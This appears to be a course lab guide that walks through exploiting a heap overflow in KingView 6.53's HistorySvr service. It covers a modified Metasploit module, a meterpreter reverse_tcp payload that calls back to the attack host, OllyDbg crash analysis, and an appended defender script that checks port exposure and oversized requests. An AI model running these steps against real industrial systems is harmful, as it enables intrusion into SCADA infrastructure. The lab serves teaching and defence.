System 1 Application Test Lab Document

Lab principle
The vulnerability lies in the HistorySvr.exe process of KingView (组态王) 6.53. When this service program, which listens on TCP port 777, receives an over-long request, a heap buffer overflow occurs and arbitrary code can be executed.

Lab purpose
Using an exploit program obtained from the network that targets KingView 6.53, carry out an attack on the software and perform the related operations.

Lab environment
Attack machine: Kali Linux virtual machine (provided with the environment)
Target machine: Windows XP SP3 virtual machine (provided with the environment)
KingView software (provided in the software resource package)
OllyDbg, 1 copy (provided in the software resource package)
Recommended class time: 2 periods

Lab steps

Step one: start the service, build and import the test PoC

(1) Install the KingView 6.53 industrial software in the Windows XP SP3 virtual machine; the HistorySvr.exe process starts automatically. Open the Windows cmd terminal and enter the command netstat -an. TCP port 777 is shown as open, as in the figure below:

Figure 1: checking which ports are open (netstat -an output on the target; TCP 0.0.0.0:777 is in the LISTENING state, the host address is 192.168.21.141)

(2) Obtain the vulnerability PoC from the network (the PoC file is submitted together with the lab resources) and open it with Sublime. Add a new target in the PoC code; for the Ret value, simply write one that is the same as the entry above it, as shown below:

Figure 2: changing the target in the PoC file

(3) Following the same pattern, add the code shown below, replacing the shellcode address with "ABAC" so that the shellcode can be located quickly. Save the modified PoC as kingview6.53overflow_attack.rb, as shown below:

Figure 3: the added code (screenshot of the modified Ruby module with the new "XP SP3 CH" target branch, which inserts the "ABAC" marker before the encoded payload)

(4) On the Kali attack machine, place the code file built above into the directory shown in the figure below:

Figure 4: importing the file into Kali (listing of the scada module directory, with kingview6.53overflow_attack.rb next to the other modules)

Enter the command msfconsole to start MSF, then enter the command reload_all to load the modules, as shown below:

Figure 5: entering the msf console
Figure 6: reloading the modules (reload_all; a warning is printed that some modules under /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/ could not be loaded, with details in /home/kali/.msf4/logs/framework.log)

Step two: attack using the module

(1) On the attack machine run the command search kingview to search for the vulnerability; the result is shown below:

Figure 7: searching for the attack module. The search lists two modules:
  0  exploit/windows/fileformat/kingview_kingmess_kvl  2012-11-20  normal  KingView Log File Parsing Buffer Overflow
  1  exploit/windows/scada/kingview653overflow_attack              good    Kingview 6.53 SCADA HMI HistorySvr Heap Overflow

(2) On the attack machine use the kingview653overflow_attack module and perform the following operations:
use exploit/windows/scada/kingview6.53overflow_attack   : use the kingview6.53overflow_attack vulnerability module
set payload                                              : set the payload; here windows/meterpreter/reverse_tcp is chosen
set lhost                                                : specify the source IP address (the attack machine's IP)
set rhost                                                : specify the destination IP address (the target machine's IP)
set target 2                                             : select the target operating system
The result is shown below:

Figure 8: attack steps (console screenshot; note that use exploit/windows/scada/kingview6.53overflow_attack reports "Failed to load module", and the module is then loaded under the name shown by the search, exploit/windows/scada/kingview653overflow_attack; the payload defaults to windows/meterpreter/reverse_tcp, after which payload, lhost, rhost and target 2 are set)

(3) On the target machine, capture the process exception with OllyDbg: enable "Just-in-time debugging" in OllyDbg, as shown in the figures below:

Figure 9: interface selection
Figure 10: option selection

(4) On the attack machine enter "exploit" to run the attack against the target, as shown below:

Figure 11: running the attack (console output: "Started reverse TCP handler on 192.168.21.135:4444", "192.168.21.141:777 - Trying target Windows XP SP3 CH", "Exploit completed, but no session was created.")

Back on the target machine, OllyDbg has caught a process exception, which shows that the attack executed successfully. The process is stopped at 0x00384342; the exception screenshot is shown below:

Figure 12: screenshot of the exception point

(5) Click the Memory button in the View menu to open the memory page, press Ctrl+B to open the memory string search, and search for the string "ABAC" built in step one, as shown in the figures below:

Figure 13: memory interface options (OllyDbg View menu on HistorySvr.exe; the status bar reads "Access violation when reading [00A1FB90] - use Shift+F7/F8/F9 to pass exception to program")
Figure 14: memory interface (OllyDbg memory map of HistorySvr.exe: thread stacks, the King module's PE header and .text, .rdata, .data, SHARED, .rsrc and .reloc sections, and system DLLs such as uxtheme, COMCTL32 and hnetcfg)
Figure 15: string search interface

(6) After the memory search has run for a while, it locates "ABAC" successfully, as shown below:

Figure 16: location of the string (OllyDbg dump window for the region 7FFA0000..7FFD2FFF, around address 7FFA2413)
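As an added defender-side companion to the lab above (this is not code from the lab document or from the KingView project), the following Python script shows the two checks a plant or SOC engineer would want from step one and the lab principle: whether HistorySvr's TCP 777 is reachable from other hosts, and whether any request to that port is far longer than a normal one. The netstat excerpt and traffic records are constructed samples, and the 4096-byte threshold is an assumption.

```python
# Added defender-side example for the lab above (not from the lab document).
# It parses a constructed `netstat -an` excerpt to see whether HistorySvr's
# TCP 777 is reachable from other hosts, and flags requests to that port whose
# payload is far longer than a normal one (the lab's overflow needs an
# over-long request). The 4096-byte threshold is an assumption; tune it.
import re

HISTORYSVR_PORT = 777
MAX_NORMAL_REQUEST = 4096  # assumed upper bound for a legitimate request
# Constructed netstat -an excerpt in the Windows XP layout shown in Figure 1.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:777            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING
"""
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+(?:\s+(\w+))?\s*$")

def tcp_listeners(netstat_text):
    """Map port -> local IP for every TCP socket in LISTENING state."""
    listeners = {}
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(1) == "TCP" and m.group(4) == "LISTENING":
            listeners[int(m.group(3))] = m.group(2)
    return listeners

def historysvr_exposure(netstat_text):
    """'exposed' if 777 listens on 0.0.0.0 (reachable from the attack VM),
    'local' if bound to loopback only, 'closed' if not listening."""
    ip = tcp_listeners(netstat_text).get(HISTORYSVR_PORT)
    if ip is None:
        return "closed"
    return "local" if ip.startswith("127.") else "exposed"

def oversized_requests(requests, limit=MAX_NORMAL_REQUEST):
    """requests: (src_ip, dst_port, payload_len) tuples from a capture.
    Returns those aimed at port 777 whose payload exceeds `limit`."""
    return [r for r in requests if r[1] == HISTORYSVR_PORT and r[2] > limit]

# Constructed sample: two ordinary requests and one ~32 KB request, the
# order of size the lab's PoC sends (31752 filler bytes plus padding).
SAMPLE_REQUESTS = [
    ("192.168.21.10", 777, 120),
    ("192.168.21.135", 777, 32800),
    ("192.168.21.10", 7001, 40000),  # other service: not flagged
]

if __name__ == "__main__":
    print("HistorySvr port 777:", historysvr_exposure(SAMPLE_NETSTAT))
    for src, port, n in oversized_requests(SAMPLE_REQUESTS):
        print(f"suspicious {n}-byte request from {src} to TCP {port}")
```

An "exposed" result means the service is reachable from any host on the segment, so restricting port 777 at the host firewall or network boundary to trusted clients is the first mitigation; a flagged oversized request is the network-side signature of the condition the lab triggers.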